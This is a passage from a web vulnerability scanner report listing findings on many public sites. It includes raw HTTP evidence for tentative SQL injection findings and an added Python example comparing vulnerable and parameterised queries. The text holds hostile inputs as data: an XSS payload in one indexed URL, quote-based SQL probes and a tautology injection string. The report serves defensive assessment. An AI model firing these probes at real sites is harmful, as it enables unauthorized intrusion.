23.103. http://www.inceptor.com/

23.104. http://www.jackpotcity.com/about-us.aspx

23.105. http://www.jackpotcity.com/js/jquery.hoverIntent.minified.js

23.106. http://www.kobobooks.com/

23.107. http://www.lightinthebox.com/wholesale-Shower-Faucets_c2863

23.108. http://www.milanoo.com/

23.109. http://www.myservicemonster.com/

23.110. http://www.oakland.edu/cdf/x22

23.111. http://www.opensource.org/licenses/mit-license.php

23.112. http://www.orgplus.com/x22

23.113. http://www.positioniseverything.net/abs_relbugs.html

23.114. http://www.positioniseverything.net/easyclearing.html

23.115. http://www.sfweekly.com/2010-08-11/news/ihelp-for-autism/

23.116. http://www.smartdevil.com/Resources/Shared/scripts/DotNetNukeAjaxShared.js

23.117. http://www.smartdevil.com/Resources/Shared/scripts/widgets.js

23.118. http://www.smartdevil.com/privacy.aspx

23.119. http://www.smartdevil.com/terms.aspx

23.120. https://www.smartdevil.com/Resources/Shared/scripts/DotNetNukeAjaxShared.js

23.121. https://www.smartdevil.com/Resources/Shared/scripts/widgets.js

23.122. https://www.smartdevil.com/privacy.aspx

23.123. https://www.smartdevil.com/terms.aspx

23.124. http://www.supermedia.com/help/web-hosting

23.125. http://www.supermedia.com/press

23.126. http://www.supermedia.com/press/

23.127. http://www.supermedia.com/trust/privacy-security

23.128. http://www.supermedia.com/trust/terms-of-use

23.129. https://www.supermedia.com/ecommerce/basic-ecommerce

23.130. https://www.supermedia.com/ecommerce/compare-ecommerce-options

23.131. https://www.supermedia.com/ecommerce/premium-ecommerce

23.132. https://www.supermedia.com/ecommerce/unlimited-ecommerce

23.133. https://www.supermedia.com/help/web-hosting

23.134. https://www.supermedia.com/press

23.135. https://www.supermedia.com/spportal/spportalFlow.do

23.136. https://www.supermedia.com/trust/privacy-security

23.137. https://www.supermedia.com/trust/terms-of-use

23.138. http://www.superpages.com/

23.139. http://www.superpages.com/superguarantee/

23.140. http://www.thefutoncritic.com/devwatch/wright-vs-wrong/x22

23.141. http://www.thumbshots.com/

23.142. http://www.thumbshots.com/Community.aspx

23.143. http://www.thumbshots.com/Community/Feedback.aspx

23.144. http://www.thumbshots.com/Community/SuccessStories.aspx

23.145. http://www.thumbshots.com/Home.aspx

23.146. http://www.thumbshots.com/Resources/Shared/scripts/DotNetNukeAjaxShared.js

23.147. http://www.thumbshots.com/Resources/Shared/scripts/widgets.js

23.148. http://www.thumbshots.com/Support.aspx

23.149. http://www.thumbshots.com/default.aspx

23.150. http://www.thumbshots.com/privacy.aspx

23.151. http://www.thumbshots.com/terms.aspx

23.152. http://www.tucows.com/advertise.html

23.153. http://www.tucows.com/affiliate/index.html

23.154. http://www.tucows.com/contact.html

23.155. http://www.veoh.com/

23.156. http://www.veoh.com/browse/groups

23.157. http://www.veoh.com/browse/groups/

23.158. http://www.veoh.com/browse/movies

23.159. http://www.veoh.com/browse/movies/

23.160. http://www.veoh.com/browse/music

23.161. http://www.veoh.com/browse/music/

23.162. http://www.veoh.com/browse/tvshows

23.163. http://www.veoh.com/browse/tvshows/

23.164. http://www.veoh.com/browse/videos

23.165. http://www.veoh.com/browse/videos/category/action_adventure

23.166. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18647177dJ8p2YBE

23.167. http://www.veoh.com/browse/videos/category/action_adventure/watch/v189741093prNNZM5

23.168. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8

23.169. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22

23.170. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp

23.171. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207484775fTsGMdN

23.172. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207490874eKBjfZC

23.173. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20749145FCR2QekA

23.174. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20753891TQ237Z7N

23.175. http://www.veoh.com/browse/videos/category/action_adventure/watch/v2075425966g5b8E8

23.176. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20754927ZpAfSEzt

23.177. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20756872Ta2Y7sDB

23.178. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20757961gnh48zmS

23.179. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20758438BTte3QQz

23.180. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20759029Mf8YXNhr

23.181. http://www.veoh.com/browse/videos/category/action_adventure4957f

23.182. http://www.veoh.com/browse/videos/category/action_adventure4957f">b411440d815/watch/v18978294NGnK88j8/javascript:Search.searchng('')

23.183. http://www.veoh.com/browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d815/watch/v18978294NGnK88j8/a

23.184. http://www.veoh.com/browse/videos/category/animation/watch/v20767083WdnCj7gW

23.185. http://www.veoh.com/browse/videos/category/celebrity_and_showbiz/watch/v20767641DYmkkC9T

23.186. http://www.veoh.com/browse/videos/category/educational_and_howto/watch/v20767155HXCcYkcJ

23.187. http://www.veoh.com/browse/videos/category/entertainment/watch/v20767324YkGXZzfQ

23.188. http://www.veoh.com/browse/videos/category/people_and_blogs/watch/v20767178Fn5bZQJP

23.189. http://www.veoh.com/browse/webseries

23.190. http://www.veoh.com/browse/webseries/

23.191. http://www.veoh.com/browse/webseries/featured/1

23.192. http://www.veoh.com/bulletin

23.193. http://www.veoh.com/collection/Veoh-Editor-Picks

23.194. http://www.veoh.com/corporate/aboutus

23.195. http://www.veoh.com/corporate/copyright

23.196. http://www.veoh.com/corporate/pressroom

23.197. http://www.veoh.com/corporate/privacypolicy

23.198. http://www.veoh.com/corporate/termsofuse

23.199. http://www.veoh.com/download

23.200. http://www.veoh.com/download/index/permalinkId/v18978294NGnK88j8

23.201. http://www.veoh.com/faq

23.202. http://www.veoh.com/favorites

23.203. http://www.veoh.com/help

23.204. http://www.veoh.com/login

23.205. http://www.veoh.com/messages/inbox

23.206. http://www.veoh.com/metrics/logadevent

23.207. http://www.veoh.com/myinterests

23.208. http://www.veoh.com/myplaylists

23.209. http://www.veoh.com/myprofile/videos

23.210. http://www.veoh.com/publish/video

23.211. http://www.veoh.com/register

23.212. http://www.veoh.com/search/videos/q/-MENUVALUE-

23.213. http://www.veoh.com/search/videos/q/publisher:bunny12344

23.214. http://www.veoh.com/support.html

23.215. http://www.veoh.com/users/JDFox5

23.216. http://www.veoh.com/users/MitchRider

23.217. http://www.veoh.com/users/Veoh-Action-Anime

23.218. http://www.veoh.com/users/Veoh-Horror-Movies

23.219. http://www.veoh.com/users/Veoh-Upcoming-Movies

23.220. http://www.veoh.com/users/bunny12344

23.221. http://www.veoh.com/users/tonysurfs

23.222. http://www.veoh.com/veohtv

23.223. http://www.veoh.com/video/conduit

23.224. http://www.veoh.com/video/flag/permalinkId/v18978294NGnK88j8

23.225. http://www.veoh.com/video/share/permalinkId/v18978294NGnK88j8

23.226. http://www.w3.org/TR/html4/loose.dtd

23.227. http://www.waspbarcode.com/scanners/

24. Private IP addresses disclosed

24.1. http://cdn.gigya.com/JS/gigya.js

24.2. http://digg.com/submit

24.3. http://digg.com/submit

24.4. http://digg.com/submit

24.5. http://download.cnet.com/SmartDraw-2010/3000-2075_4-10002466.html/x22

25. Credit card numbers disclosed

26. Robots.txt file

26.1. http://a.abc.com/service/gremlin/css/files/register-loader,abc-community.css

26.2. http://ads.gmodules.com/gadgets/ifr

26.3. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1030885431/

26.4. http://ll.static.abc.com/m/vp/prod/images/nav/navbg.png

26.5. http://store.apple.com/us

26.6. https://store.apple.com/Apple/WebObjects/OrderStatus.woa

26.7. http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s07964217748958

26.8. http://uat.netmng.com/pixel/

26.9. http://www.apple.com/

26.10. http://www.googleadservices.com/pagead/conversion/1030885431/

26.11. http://www.supermedia.com/support/contact-us/company

26.12. https://www.supermedia.com/spportal/style/form.css

27. Cacheable HTTPS response

27.1. https://accounts.brightcove.com/en/terms-and-conditions/.

27.2. https://appleid.apple.com/cgi-bin/WebObjects/MyAppleId.woa

27.3. https://author.tucows.com/

27.4. https://bugzilla.mozilla.org/show_bug.cgi

27.5. https://buy.itunes.apple.com/WebObjects/MZFinance.woa/wa/redeemLandingPage

27.6. https://chat.teamsalesagent.com/tsa/JS/direct_619.html

27.7. https://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab

27.8. https://i.spin3.com/jackpotcity/en/web/

27.9. https://iforgot.apple.com/cgi-bin/WebObjects/DSiForgot.woa/134/wo/3xyYPhJSmD1Fcb86H5Gepg/0.11.4.1.1.3.3.17.11.3.1

27.10. https://iforgot.apple.com/cgi-bin/WebObjects/DSiForgot.woa/134/wo/3xyYPhJSmD1Fcb86H5Gepg/0.11.4.1.1.3.3.17.5

27.11. https://iforgot.apple.com/cgi-bin/WebObjects/DSiForgot.woa/134/wo/3xyYPhJSmD1Fcb86H5Gepg/0.11.4.1.1.3.3.7.1.5

27.12. https://iforgot.apple.com/favicon.ico

27.13. https://mktws.apple.com/acdws/notify.js

27.14. https://ssl.apple.com/global/metrics/us/us.myinfo.metrics.html

27.15. https://store.apple.com/Catalog/US/Images/ordernumberinfo.html

27.16. https://www.securecheckout.billmelater.com/paycapture-content/fetch

27.17. https://www.smartdevil.com/

27.18. https://www.smartdevil.com/Home.aspx

27.19. https://www.smartdevil.com/SSLLogin.aspx

27.20. https://www.smartdevil.com/SSLLogin/tabid/116/Default.aspx

27.21. https://www.smartdevil.com/SSLLogin/tabid/116/ctl/SendPassword/Default.aspx

27.22. https://www.smartdevil.com/ScriptResource.axd

27.23. https://www.smartdevil.com/WebResource.axd

27.24. https://www.smartdevil.com/privacy.aspx

27.25. https://www.smartdevil.com/terms.aspx

27.26. https://www.supermedia.com/

27.27. https://www.supermedia.com/about-us

27.28. https://www.supermedia.com/about-us/corporate-profile

27.29. https://www.supermedia.com/about-us/executive-team

27.30. https://www.supermedia.com/about-us/our-clients

27.31. https://www.supermedia.com/advertising-goals

27.32. https://www.supermedia.com/business-listings

27.33. https://www.supermedia.com/business-listings/coupons

27.34. https://www.supermedia.com/business-listings/listing-enhancements-packages

27.35. https://www.supermedia.com/careers

27.36. https://www.supermedia.com/careers/compensation-benefits

27.37. https://www.supermedia.com/careers/core-values

27.38. https://www.supermedia.com/careers/employees-retirees

27.39. https://www.supermedia.com/careers/job-search

27.40. https://www.supermedia.com/careers/professional-development

27.41. https://www.supermedia.com/client-solutions

27.42. https://www.supermedia.com/client-solutions/client-stories

27.43. https://www.supermedia.com/client-solutions/local-retail

27.44. https://www.supermedia.com/client-solutions/local-service

27.45. https://www.supermedia.com/client-solutions/national-brand-agencies

27.46. https://www.supermedia.com/client-solutions/share-the-wealth

27.47. https://www.supermedia.com/client-solutions/web-based-business

27.48. https://www.supermedia.com/community/barter-network

27.49. https://www.supermedia.com/community/newsletter

27.50. https://www.supermedia.com/direct-mail

27.51. https://www.supermedia.com/direct-mail/call-tracking

27.52. https://www.supermedia.com/direct-mail/compare-direct-mail-options

27.53. https://www.supermedia.com/direct-mail/postcards

27.54. https://www.supermedia.com/direct-mail/shared-card-packs

27.55. https://www.supermedia.com/directory-options

27.56. https://www.supermedia.com/domain-names

27.57. https://www.supermedia.com/ecommerce

27.58. https://www.supermedia.com/ecommerce/basic-ecommerce

27.59. https://www.supermedia.com/ecommerce/compare-ecommerce-options

27.60. https://www.supermedia.com/ecommerce/getting-started

27.61. https://www.supermedia.com/ecommerce/premium-ecommerce

27.62. https://www.supermedia.com/ecommerce/unlimited-ecommerce

27.63. https://www.supermedia.com/help

27.64. https://www.supermedia.com/help/account-information

27.65. https://www.supermedia.com/help/account-information/sign-in

27.66. https://www.supermedia.com/help/business-listings

27.67. https://www.supermedia.com/help/direct-mail

27.68. https://www.supermedia.com/help/domains-email

27.69. https://www.supermedia.com/help/local-search-marketing

27.70. https://www.supermedia.com/help/online-stores

27.71. https://www.supermedia.com/help/search-marketing-services

27.72. https://www.supermedia.com/help/search-marketing-services/reporting

27.73. https://www.supermedia.com/help/telephone-service

27.74. https://www.supermedia.com/help/terms-conditions

27.75. https://www.supermedia.com/help/web-hosting

27.76. https://www.supermedia.com/help/web-site-design

27.77. https://www.supermedia.com/help/yellow-pages

27.78. https://www.supermedia.com/local-search-marketing/do-it-yourself

27.79. https://www.supermedia.com/local-search-marketing/services

27.80. https://www.supermedia.com/marketing-success

27.81. https://www.supermedia.com/media-network/affiliate-program

27.82. https://www.supermedia.com/media-network/market-coverage

27.83. https://www.supermedia.com/media-network/mobile

27.84. https://www.supermedia.com/media-network/online-ad-network

27.85. https://www.supermedia.com/media-network/our-brands

27.86. https://www.supermedia.com/media-network/sem-partners

27.87. https://www.supermedia.com/national-agency-products/media-kit

27.88. https://www.supermedia.com/online-advertising

27.89. https://www.supermedia.com/packaged-solutions

27.90. https://www.supermedia.com/packaged-solutions/auto-dealer-packages

27.91. https://www.supermedia.com/packaged-solutions/business-profile-packages

27.92. https://www.supermedia.com/packaged-solutions/multi-product-packages

27.93. https://www.supermedia.com/press

27.94. https://www.supermedia.com/print-advertising/white-pages

27.95. https://www.supermedia.com/print-advertising/yellow-pages

27.96. https://www.supermedia.com/reputation-monitoring

27.97. https://www.supermedia.com/social-responsibility

27.98. https://www.supermedia.com/spportal/

27.99. https://www.supermedia.com/spportal/404.jsp

27.100. https://www.supermedia.com/spportal/landingpages.do

27.101. https://www.supermedia.com/superguarantee/join

27.102. https://www.supermedia.com/support/contact-us

27.103. https://www.supermedia.com/support/site-map

27.104. https://www.supermedia.com/trust/privacy-security

27.105. https://www.supermedia.com/trust/social-media-content-disclaimer

27.106. https://www.supermedia.com/trust/terms-of-use

27.107. https://www.supermedia.com/video-ads

27.108. https://www.supermedia.com/web-design

27.109. https://www.supermedia.com/web-hosting

27.110. https://www.supermedia.com/web-sites

27.111. https://www.thumbshots.com/Products/ThumbshotsImages/IntegrationCode.aspx

28. Multiple content types specified

28.1. http://ll-appserver.veoh.com/scripts/veoh.js

28.2. http://sr2.liveperson.net/visitor/addons/deploy.asp

29. HTML does not specify charset

29.1. http://2e76.v.fwmrm.net/

29.2. http://abcnews.go.com/Sports/wireStory

29.3. http://ad.doubleclick.net/adi/N3671.TMP/B5159652.23

29.4. http://ad.doubleclick.net/adi/N3671.TMP/B5159652.24

29.5. http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.4

29.6. http://ad.doubleclick.net/adi/lb.buzzillions/

29.7. http://adcontent.videoegg.com/alternates/tucows_alt_300x250.html

29.8. http://adcontent.videoegg.com/alternates/tucows_default_728x90.html

29.9. http://adserver.adtechus.com/adrawdata/3.0/5108.1/1443976/0/0/ADTECH

29.10. http://blog.supermedia.com/comment_form.php

29.11. http://blog.supermedia.com/comment_html.php

29.12. http://c.brightcove.com/services/messagebroker/amf

29.13. https://cbi.boldchat.com/favicon.ico

29.14. http://cdn.unicast.msn.com/script/V3.00/deliver2.html

29.15. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_0.html

29.16. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_1.html

29.17. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_10.html

29.18. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_2.html

29.19. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_3.html

29.20. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_4.html

29.21. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_5.html

29.22. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_6.html

29.23. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_7.html

29.24. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_8.html

29.25. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_9.html

29.26. http://cdn1.trafficmp.com/prod/ig/110121-160940_ig.html

29.27. http://core.videoegg.com/eap/12368/html/jstags.html

29.28. http://fearthedevil.com/x22

29.29. http://fls.doubleclick.net/activityi

29.30. http://jqueryui.com/about

29.31. http://jqueryui.com/themeroller/

29.32. http://managedq.com/search.php

29.33. http://sales.liveperson.net/visitor/liveperson/chat-button/

29.34. http://sr2.liveperson.net/visitor/addons/deploy.asp

29.35. https://store.apple.com/Apple/WebObjects/OrderStatus.woa/5134007/wo/ZB4oWsbh0bCLk6bYCPyBtM/0.2.1.0.0.0.29.1.5.15.7.1.5.3.1.0.0

29.36. https://store.apple.com/Apple/WebObjects/OrderStatus.woa/5134007/wo/ZB4oWsbh0bCLk6bYCPyBtM/0.2.1.0.0.0.29.1.5.15.7.13

29.37. https://store.apple.com/Catalog/US/Images/ordernumberinfo.html

29.38. http://telecommunications.jobs.net/Michigan.htm/x22

29.39. https://redcated/iaction/00asup_RetargetingSecure_1

29.40. https://redcated/iaction/00asup_SigninbuttonPage_10

29.41. http://www.city-data.com/zips/48083.html/x22

29.42. http://www.expertrating.com/

29.43. http://www.facebook.com/share.php

29.44. http://www.forlocations.com/

29.45. http://www.jobs.net/Michigan.htm/x26amp

29.46. http://www.lights.ca/publisher/db/2/5952.html/x22

29.47. http://www.lwis.net/

29.48. http://www.thesfmarathon.com/wp-content/plugins/forum-server/fs-admin/wpf-usergroup-edit.php

29.49. http://www.tucows.com/videoegg/ad.html

29.50. http://www.wugnet.com/shareware/spow.asp

30. HTML uses unrecognised charset

30.1. http://store.apple.com/Catalog/US/Images/intlstoreroutingpage.html

30.2. http://www.made-in-china.com/

31. Content type incorrectly stated

31.1. http://2e76.v.fwmrm.net/

31.2. http://abc.go.com/favicon.ico

31.3. http://ads.adap.tv/beacons

31.4. http://ads.gmodules.com/gadgets/makeRequest

31.5. http://adserver.adtechus.com/adrawdata/3.0/5108.1/1443976/0/0/ADTECH

31.6. http://amch.questionmarket.com/adsc/d647401/46/794570/randm.js

31.7. http://amch.questionmarket.com/adsc/d647401/46/799689/randm.js

31.8. http://amch.questionmarket.com/adsc/d724324/16/726813/randm.js

31.9. http://amch.questionmarket.com/adsc/d724324/16/752263/randm.js

31.10. http://amch.questionmarket.com/adsc/d724324/16/752264/randm.js

31.11. http://amch.questionmarket.com/adsc/d724324/16/752265/randm.js

31.12. http://amch.questionmarket.com/adsc/d724324/16/752266/randm.js

31.13. http://amch.questionmarket.com/adsc/d724324/27/726813/randm.js

31.14. http://amch.questionmarket.com/adsc/d724324/27/752266/randm.js

31.15. http://amch.questionmarket.com/adsc/d724324/27/752268/randm.js

31.16. http://amch.questionmarket.com/adsc/d724324/27/752269/randm.js

31.17. http://amch.questionmarket.com/adsc/d724324/27/752289/randm.js

31.18. http://amch.questionmarket.com/adsc/d747416/11/748729/randm.js

31.19. http://amch.questionmarket.com/adsc/d747416/11/755589/randm.js

31.20. http://amch.questionmarket.com/adsc/d747416/11/755592/randm.js

31.21. http://amch.questionmarket.com/adsc/d763769/11/770950/randm.js

31.22. http://amch.questionmarket.com/adsc/d763769/11/775951/randm.js

31.23. http://amch.questionmarket.com/adsc/d793570/3/793590/randm.js

31.24. http://amch.questionmarket.com/adsc/d793570/3/793591/randm.js

31.25. http://amch.questionmarket.com/adsc/d798609/10/805369/randm.js

31.26. http://amch.questionmarket.com/adsc/d798609/10/805370/randm.js

31.27. http://api.veoh.com/crossdomain.xml

31.28. http://app.scanscout.com/ssframework/adStreamJSController.htm

31.29. http://app.scanscout.com/ssframework/adStreamJSController.xml

31.30. http://as1.suitesmart.com/

31.31. http://beacon.videoegg.com/

31.32. http://beacon.videoegg.com/adpo

31.33. http://beacon.videoegg.com/amcload

31.34. http://beacon.videoegg.com/demo

31.35. http://beacon.videoegg.com/echo

31.36. http://beacon.videoegg.com/initjs

31.37. http://beacon.videoegg.com/invpos

31.38. http://blog.supermedia.com/comment_form.php

31.39. http://cdn.gigya.com/js/gigya.services.socialize.plugins.simpleshare.min.js

31.40. http://cdn.taboolasyndication.com/libtrc/veoh/rbox.en.4-6-1-43135.json

31.41. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_0.html

31.42. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_1.html

31.43. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_10.html

31.44. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_2.html

31.45. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_3.html

31.46. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_4.html

31.47. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_5.html

31.48. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_6.html

31.49. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_7.html

31.50. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_8.html

31.51. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_9.html

31.52. http://content.scanscout.com/ssframework/dt/dl_0.js

31.53. http://core.videoegg.com/eap/

31.54. http://core.videoegg.com/sites/

31.55. http://core.videoegg.com/sites/advertise.tucows.com.js

31.56. https://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab

31.57. http://goku.brightcove.com/1pix.gif

31.58. https://iforgot.apple.com/favicon.ico

31.59. http://images.apple.com/global/nav/scripts/globalnav.js

31.60. http://ir.supermedia.com/common/images/icon_share.gif

31.61. http://ir.supermedia.com/common/mobile/

31.62. http://l0.scanscout.com/ssframework/logController.xml

31.63. http://maps.gstatic.com/intl/en_us/mapfiles/openhand_8_8.cur

31.64. https://mktws.apple.com/acdws/notify.js

31.65. https://mktws.apple.com/acdwsweb/ACDwsAction.do

31.66. http://mobile.jackpotcity.com/controls/captcha.aspx

31.67. http://my.supermedia.com/includes/captcha/index.jsp

31.68. http://rad.msn.com/ADSAdClient31.dll

31.69. http://sr2.liveperson.net/hcp/html/mTag.js

31.70. http://sr2.liveperson.net/visitor/addons/deploy.asp

31.71. https://store.apple.com/Apple/WebObjects/OrderStatus.woa/5134007/wo/ZB4oWsbh0bCLk6bYCPyBtM/0.2.1.0.0.0.29.1.5.15.7.1.5.3.1.0.0

31.72. https://store.apple.com/Apple/WebObjects/OrderStatus.woa/5134007/wo/ZB4oWsbh0bCLk6bYCPyBtM/0.2.1.0.0.0.29.1.5.15.7.13

31.73. http://storeimages.apple.com/1806/store.apple.com/rs/css/i/aos/cart/cart-options-print.gif

31.74. http://trc.taboolasyndication.com/dispatch/

31.75. http://trc.taboolasyndication.com/favicon.ico

31.76. http://video.od.visiblemeasures.com/log

31.77. http://videos.smartdesis.com/12948/watch-robo-telugu-movie-online/x22

31.78. http://videos.smartdesis.com/12962/watch-mahesh-khaleja-movie-online-tc-rip/x22

31.79. http://videos.smartdesis.com/13039/watch-ntrs-brindavanam-movie-online-tc-rip/x22

31.80. http://videos.smartdesis.com/13201/watch-rakht-charitra-2-movie-online/x22

31.81. http://videos.smartdesis.com/hindi-online-movies-index/x22

31.82. http://videos.smartdesis.com/page/2/x22

31.83. http://videos.smartdesis.com/tamil-online-movies-index/x22

31.84. http://videos.smartdesis.com/telugu-online-movies-index-a/x22

31.85. http://videos.smartdesis.com/x22

31.86. http://www.buzzillions.com/favicon.ico

31.87. http://www.facebook.com/extern/login_status.php

31.88. http://www.kminek.pl/bsdlicense.txt

31.89. http://www.sustainabilitycoalition.org/wp-content/plugins/forum-server/fs-admin/error_log

31.90. http://www.thesfmarathon.com/wp-content/plugins/forum-server/fs-admin/wpf-usergroup-edit.php

31.91. http://www.thumbshots.com/portals/0/Flash/BannerRotator/images.xml

31.92. http://www.w3.org/2006/04/ttaf1

31.93. http://www.w3.org/TR/html4/loose.dtd

32. Content type is not specified

32.1. http://ad.trafficmp.com/a/js

32.2. http://load.tubemogul.com/core

32.3. http://store.apple.com/us/cartx/save

33. SSL certificate

33.1. https://store.apple.com/

33.2. https://www.supermedia.com/



1. SQL injection
There are 25 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://amch.questionmarket.com/adsc/d647401/46/799689/randm.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adsc/d647401/46/799689/randm.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Note that in the evidence below both responses are HTTP 404 pages rather than database errors, and they carry different Server headers (Apache versus Apache-AdvancedExtranetServer/2.0.50), which indicates that the two requests were answered by different back-end servers. The change in error page is therefore at least as likely to reflect which server handled the request as any change in SQL behaviour; treat this as a candidate for manual verification, not a confirmed finding.
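The following is an added example, not part of the scanner report or of any of the scanned applications. It reproduces the probe heuristic described in the Issue detail above (a single quote breaks the string literal and causes a syntax error; a doubled quote is a valid escaped literal and does not) against a deliberately vulnerable lookup, and sets the parameterised form recommended in the Issue remediation section beside it, which is immune to both the probe and a real injection. It uses an in-memory SQLite table with constructed rows; the table name, column names and the assumption that the scanned endpoint looks up a record by its first path segment are all hypothetical.

```python
import sqlite3

# Constructed sample data standing in for the application's real database.
# Assumption (hypothetical): the scanned endpoint resolves the first REST
# path segment, e.g. d647401, to a record in a table called ads.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ads (id TEXT PRIMARY KEY, script TEXT)")
    conn.executemany("INSERT INTO ads VALUES (?, ?)",
                     [("d647401", "randm-A"), ("d724324", "randm-B")])
    return conn


def lookup_unsafe(conn, ad_id):
    """Vulnerable: the path segment is concatenated into the SQL text, so a
    quote in the input terminates the string literal and alters the query."""
    sql = "SELECT script FROM ads WHERE id = '" + ad_id + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, ad_id):
    """Parameterised: the query structure is fixed first and the value is
    bound second, so the database never parses the input as SQL."""
    sql = "SELECT script FROM ads WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (ad_id,))]


def probe(lookup):
    """Replay the scanner's differential test on a lookup function:
    send the value with one trailing quote, then with two.
    Returns (error_with_one_quote, error_with_two_quotes)."""
    conn = make_db()
    outcome = []
    for payload in ("d647401'", "d647401''"):
        try:
            lookup(conn, payload)
            outcome.append(False)
        except sqlite3.OperationalError:
            outcome.append(True)   # syntax error: unterminated string literal
    return tuple(outcome)


if __name__ == "__main__":
    print("unsafe probe:", probe(lookup_unsafe))   # (True, False): the scanner's signature
    print("safe probe:  ", probe(lookup_safe))     # (False, False)
    db = make_db()
    print("unsafe, tautology:", lookup_unsafe(db, "x' OR '1'='1"))  # every row
    print("safe, tautology:  ", lookup_safe(db, "x' OR '1'='1"))    # []
```

The (error, no error) pattern from `probe(lookup_unsafe)` is exactly what the scanner looks for; the point of the caveat above is that a 404 page swapped for a different 404 page produces the same pattern without any SQL being involved, which is why the report marks these findings Tentative.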

Request 1

GET /adsc'/d647401/46/799689/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:42 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Keep-Alive: timeout=120
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 1059


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
<dd>
If you think this is a server error, please contact
the <a href="mailto:serveradmin@dynamiclogic.com">
...[SNIP]...

Request 2

GET /adsc''/d647401/46/799689/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:42 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Content-Length: 231
Keep-Alive: timeout=120, max=903
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /adsc''/d647401/46/799689/randm.js was not found on t
...[SNIP]...

1.2. http://amch.questionmarket.com/adsc/d724324/16/752264/randm.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adsc/d724324/16/752264/randm.js

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

